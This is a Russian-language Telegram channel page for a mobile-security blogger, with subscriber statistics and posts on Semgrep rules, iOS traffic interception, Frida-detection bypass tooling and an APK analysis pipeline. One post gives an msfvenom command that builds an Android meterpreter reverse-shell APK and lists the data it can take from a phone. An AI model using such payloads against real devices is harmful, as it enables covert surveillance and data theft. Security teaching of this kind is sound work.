ru
Feedback
Дневник Комбеза

Дневник Комбеза

Открыть в Telegram

История одного Кибер Безопасника из маленького города в Сибири

Больше
Страна не указанаКатегория не указана
688
Подписчики
Нет данных24 часа
+107 дней
+6430 день

Загрузка данных...

Похожие каналы
Нет данных
Возникли проблемы? Пожалуйста, обновите страницу или обратитесь к нашему support-менеджеру .
Входящие и исходящие упоминания
---
---
---
---
---
---
Привлечение подписчиков
июль '26
июль '26
+76
в 2 каналах
июнь '26
+48
в 1 каналах
Get PRO
май '26
+21
в 0 каналах
Get PRO
апрель '26
+66
в 0 каналах
Get PRO
март '26
+69
в 0 каналах
Get PRO
февраль '26
+28
в 1 каналах
Get PRO
январь '26
+15
в 0 каналах
Get PRO
декабрь '25
+12
в 0 каналах
Get PRO
ноябрь '25
+24
в 0 каналах
Get PRO
октябрь '25
+19
в 2 каналах
Get PRO
сентябрь '25
+194
в 2 каналах
Get PRO
август '250
в 0 каналах
Get PRO
июль '25
+46
в 0 каналах
Get PRO
июнь '250
в 1 каналах
Get PRO
май '25
+148
в 1 каналах
Дата
Привлечение подписчиков
Упоминания
Каналы
29 июля+5
28 июля0
27 июля+1
26 июля+1
25 июля+3
24 июля0
23 июля+4
22 июля+4
21 июля+4
20 июля+7
19 июля+5
18 июля+21
17 июля+3
16 июля+6
15 июля0
14 июля+4
13 июля+1
12 июля+2
11 июля+1
10 июля0
09 июля0
08 июля+1
07 июля+1
06 июля0
05 июля0
04 июля0
03 июля+1
02 июля+1
01 июля0
Посты канала
Semgrep Rules Последнее время мы с командой всё чаще задумывались о том, что mobsfscan в части своего Semgrep-компонента, мягко говоря, местами глючный и довольно ограниченый. А если попробовать найти достаточно полный набор Semgrep-правил для мобильных приложений, быстро выясняется, что хорошие правила разбросаны по всему необъятному интернету🔞 Поэтому мы решили собрать всё это в одном месте и создали репозиторий: https://github.com/Sib-Coder/semgrep-mobile-rules В нём постарались собрать максимально полный набор проверок для мобильных приложений и при этом избавиться от дубликатов. Будем очень рады вашей поддержке, новым правилам и идеям для развития репозитория. Давайте делать мобилки безопаснее вместе 😎

2
Нет текста...
0
3
Пост для тех кто не боится Очень часто слышу: «Да что с помощью ваших этих мобилок можно сделать?» Сегодня практическая работ+2
Пост для тех кто не боится Очень часто слышу: «Да что с помощью ваших этих мобилок можно сделать?» Сегодня практическая работа именно для таких людей. Вам понадобится: - телефон; - Metasploit; - сеть с нормальной маршрутизацией; - навыки реверса APK — уровня детского сада достаточно. Первое, что вам нужно, — сделать APK со зловредным функционалом. Берём Metasploit и вперёд: bash msfvenom -p android/meterpreter/reverse_tcp lhost=<сюда пишете IP своего ноута> lport=8888 > $PWD/Downloads/msf.apk Дальше берёте APK, который у вас получился, и делаете так, чтобы команда adb install сработала: в паре мест патчите полученный APK и подписываете его. Не привожу полный гайд, чтобы кто попало не начал устраивать слежку за своими одноклассницами. Они и без моей помощи найдут способы для буллинга. Дальше — msfconsole, запускаем приложение на телефоне. В результате мы можем наблюдать, что даже при условии, что приложение собрано не под самую новую ОС Android, нам есть что взять с телефона: - список контактов; - SMS — даже отправить можно: я так кинул денег другу за шаурму; - скриншоты; - доступ к камере; - ... Как итог: на мой взгляд, получилась весьма показательная лаба для тех, кто говорит, что из МП ничего сделать нельзя. Советую повторить данное упражнение со своими коллегами. Ну или хотя бы покажите им этот пост :)
761
4
Традиционное ежегодное мероприятие по получению джеилбрейков объявляется открытым😂+1
Традиционное ежегодное мероприятие по получению джеилбрейков объявляется открытым😂
548
5
Нигде не безопасно. Из всех "чайников" мы уже знаем, что существует OWASP top 10 для веб-приложений, но многие ли из вас задумывались, есть ли пересечения с мобилками? А задуматься стоит, ведь мобильное приложение - это по сути тот же веб. Собственно, статья про корреляцию уязвимостей на вебе и мобилках и уникальные проблемы, а так же разбор этих уязвимостей в коде и на схемах. Кто дочитает до конца: 1 - преисполнится 2 - найдёт практический чек-лист 3 - список дополнительной литературы для погружения #AppSec #Pentest 🧠 Кибер ПТУ | 👨‍🏫 Менторство ИБ 📂 Другие каналы
556
6
+1
Прочитал книгу «Проект “Феникс”. Роман о том, как DevOps меняет бизнес к лучшему» Это очень понятная история о том, зачем вообще нужны процессы и почему без них любая команда рано или поздно начинает тонуть в хаосе. Главная мысль, которую я вынес: процессы — это не бюрократия ради бюрократии. Нормально построенный процесс помогает команде быстрее двигаться, меньше тушить пожары и лучше понимать, какую ценность она реально приносит бизнесу. Книга хорошо показывает, что IT существует не само по себе. Любая задача, релиз, багфикс или изменение в инфраструктуре должны быть связаны с бизнес-целями: деньгами, скоростью, надежностью, пользовательским опытом, снижением рисков. И отдельно мне понравилось, как через сюжет становится понятно, зачем бизнесу нужна команда безопасности. Безопасность — это не команда, которая приходит в конце и говорит: «Нет, так нельзя». В идеальном мире безопасность помогает строить процессы так, чтобы продукт развивался быстро, но при этом не создавал критичные риски для компании, клиентов и данных. Очень советую к прочтению всем кому интересно понять: как моя работа влияет на бизнес...
885
7
Android SELinux Internals Part II: домены, отказы, обходы Ребята из 8ksec наконец-то выпустили вторую часть серии про SELinux на Android! Первая часть была про основы: контексты, чтение политик, sepolicy-inject. Вторая уже про то, как это всё работает в реальности. Разбирается вся цепочка от сертификата подписи APK до SELinux-домена, роль Zygote, как работает installd. Добавили практики: chcon, runcon, как работает magiskpolicy под капотом, чем принципиально отличаются подходы Magisk, KernelSU и APatch. Очень сочная и большая статья для любителей мякотки и чтоб погрузиться поглубже в то, как и что устроено внутри. Ну и анонсированная третья часть обещает быть ещё интереснее: kernel-level техники отключения SELinux и разбор реальных CVE. Что сказать, ждем :) #Android #SELinux #Pentest #Research #Kernel #Tools
462
8
Сраный Burp… Самое неприятное в пентесте мобилок — когда приложение не работает из твоей страны, но посмотреть, куда оно ходи
Сраный Burp… Самое неприятное в пентесте мобилок — когда приложение не работает из твоей страны, но посмотреть, куда оно ходит и какие API дёргает, всё равно надо. Мы с коллегой пентестили Flutter-приложение, и мне досталась iOS-часть. А это значит: pinning, сертификаты, прокси, VPN и немного боли. Сначала собрали схему через Burp: iPhone → OpenVPN → iptables DNAT → Burp → интернет Трафик заворачивался, tcpdump показывал, что пакеты доходят, сертификаты подменялись, curl проходил. Но трафик не отображался... После часа дебага стало понятно: проблема не в OpenVPN, не в iptables и не в маршрутах. Просто Burp опять решил пожить своей жизнью и периодически не прогонял через себя весь трафик. В итоге переехали на более простую схему: iPhone → OpenVPN → iptables REDIRECT → mitmproxy → WireGuard → интернет Поднял mitmweb прямо на OpenVPN-сервере, завернул 80/443 с iPhone локально на 8080, а сам сервер выпустили наружу через wg0. Понятно что после этого надо было бы похукать пару функций через frida, но в этот раз повезло и разрабы не заморачивались. Схему, как собрать такое окружение, приложу ниже. Кстати этот метод работает на многих приложениях так как мало кто научился от него нормально защищаться.
514
9
iDump: замена frida-ios-dump без Python (но с блекджеком и обходами) Если кому-то нужно было когда-нибудь сдампить приложение с iOS трубки, то первое, что приходит на ум - классический frida-ios-dump. Но с Frida 17+ он сломался и, судя по всему, уже не починится. И вот появился iDump - переосмысление того же подхода, но без всей той боли с pip, зависимостями, правильное версией Python и тд Автор этого шикарного тула - широко известный в узких кругах @OxFi5t, спасибо ему за это! Написан на Go с использованием frida-go, и главная идея это автономность. Один самодостаточный бинарь, который уже содержит в себе Frida-агент. Скопировал в PATH и работает. Техника та же, что у оригинала: инжектим агент, патчим cryptid, вытаскиваем расшифрованные сегменты Mach-O, собираем валидный IPA. Только без лишних телодвижений 🤓 Из приятного: - поддержка батч-дампинга (можно сразу несколько приложений или вообще `--dump-all`) - фильтрация по bundle ID - пропуск системных приложений Apple Передача файлов идёт через Frida messages напрямую — SSH не нужен (хотя SSH/SFTP режим тоже есть, если USB-трансфер медленный). Отдельно порадовал флаг --dodge - встроенный bypass для приложений, которые детектят Frida и падают до того, как агент успевает что-то сделать. Есть базовый вариант (хукает libc-символы: ptrace, sysctl и тд) и --dodge=advanced для особо упоротых приложений, которые делают raw syscalls и сканируют память на Frida-сигнатуры. Ну и возможность передать свой bypass-скрипт через --early, если встроенные не справляются. Так что тут можно еще и идеи по обходу джейлбрейка/фриды подсмотреть 😉 Очень рекомендую попробовать. Как по мне, давно нужна была нормальная замена 🔥 #iOS #Frida #ReverseEngineering #Tools #iDump
446
10
Я окончательно перестал играть в CTF. Причин, наверное, несколько. Последние полгода я постепенно отключался от этого процесса и переключался на вещи, которые сейчас кажутся мне более интересными и полезными. Для меня CTF всё ещё остаётся офигенным форматом практики. Особенно в обучении: когда мы разрабатываем курсы, тренинги или внутренние соревнования, CTF-задачи отлично помогают закреплять навыки руками. Но вот участвовать в CTF как игрок на постоянной основе мне больше не хочется. Проблема не в том, что формат плохой. Проблема в том, что многие соревнования, на мой взгляд, потеряли прежний шарм. Всё чаще игра превращается не в «думай, ломай, проверяй гипотезы», а в распинывание агента. Да, можно играть без Codex, Claude и всего остального зоопарка AI-инструментов. Можно. Но зачем? Если таски пишутся с помощью ИИ, решаются с помощью ИИ, а эксплойты подбираются за секунды, то игра без ИИ превращается просто в добровольную потерю 80% силы. А ведь раньше весь кайф CTF был как раз в другом. Ты сидишь, тупишь, скрипишь мозгами, пробуешь странные идеи, проваливаешься, снова пробуешь — и в какой-то момент сам приходишь к решению. Вот это чувство и было главным. А сейчас всё чаще выглядит так: «Codex, тут сайт, походу SSTI вот в этом месте» Через несколько секунд: готовый эксплойт. В 2021 году я кайфовал от каждого решённого таска. От каждого маленького продвижения. От момента, когда после нескольких часов тупняка что-то наконец сходилось, и ты такой: «А, вот оно». Сейчас этого ощущения стало сильно меньше. Наверное, просто стало неинтересно играть в игру, где всё чаще соревнуются не люди, а их агенты.
539
11
Мой пайплайн по анализу андроид приложений: Stage 0 — APK Metadata (apk-info): Мгновенный парсинг (~2мс) манифеста без декомпиляции: пакет, SDK-версии, все permissions, exported-компоненты, подписи (v1/v2/v3), security profile. Уже на этом этапе детектит: debuggable-флаг, v1-only подпись (уязвимость Janus, CVE-2017-13156), привилегированные системные permissions, exported ContentProvider'ы без защиты. Stage 1 — Декомпиляция + сканирование APK (параллельно): Всё запускается одновременно: • JADX — декомпиляция DEX → Java (8 потоков, 60-180с) • apktool — распаковка ресурсов, AndroidManifest.xml, нативных .so библиотек (5-15с) • dexfinder — поиск использования скрытых Android API + трассировка цепочек вызовов • Mariana Trench — taint-анализ потоков данных от Meta (source→sink) • Trueseeing — Dalvik bytecode scanner • Автодетект Flutter → Blutter (реверс Dart-кода), React Native → декомпиляция Hermes Stage 2 — Статический анализ (параллельно): • 184 regex-правила — быстрый pattern matching по декомпилированным исходникам • 331 semgrep-правило — AST-анализ (taint tracking, data flow) • Анализ Blutter pp.txt (Dart-символы для Flutter-приложений) • dexfinder call chain tracing — трассировка цепочек вызовов от exported-компонентов к уязвимым методам Stage 3 — Merge + фильтрация + обогащение: • Дедупликация по (rule_id, file, line) • SDK-фильтр (732 паттерна) — убирает 98% шума от Google, Firebase, OkHttp, Retrofit и ещё 150+ SDK • Классификация severity через RoBERTa модель • Аннотация exported-статуса: кросс-проверка finding → AndroidManifest → dexfinder reachability • RAG-обогащение каждого finding контекстом из базы знаний Stage 4 — LLM-анализ (6 агентов параллельно): Каждый агент — специалист в своей области, получает только релевантные findings + RAG-контекст: • Agent 1: Manifest + Attack Surface • Agent 2: Network + TLS • Agent 3: Auth + Cryptography • Agent 4: WebView + JS Bridge • Agent 5: Business Logic • Agent 6: Native Libraries • Agent 7 (Judge): валидирует CRITICAL/HIGH от всех агентов, отсекает false positives RAG Knowledge Base: • 9675 chunks в ChromaDB (гибридный поиск: BM25 + vector + RRF) • 1547+ отчётов из 18 источников: — OWASP MASTG: 120 (тестовые процедуры с примерами кода) — HackerOne: 170 (реальные bug bounty отчёты с PoC) — MITRE ATT&CK Mobile: 124 (техники атак, детекция, митигации) — Security blogs: 207 (Google, Zimperium, Lookout, Check Point) — Samsung Bulletins: 111 (Samsung-specific CVE) — NVD: 250 (CVE с CVSS) — Exploit-DB: 50 — Android Bulletins: 34 — CISA KEV: 23 — Собственные аудиты: 144 — Прочие: arXiv, VulCorpus (94 OWASP Top-10 сэмплов) • Граф знаний: 5597 узлов, 9213 связей (CVE↔️CWE↔️MITRE↔️MASTG) • 970+ code snippets в отдельном индексе
505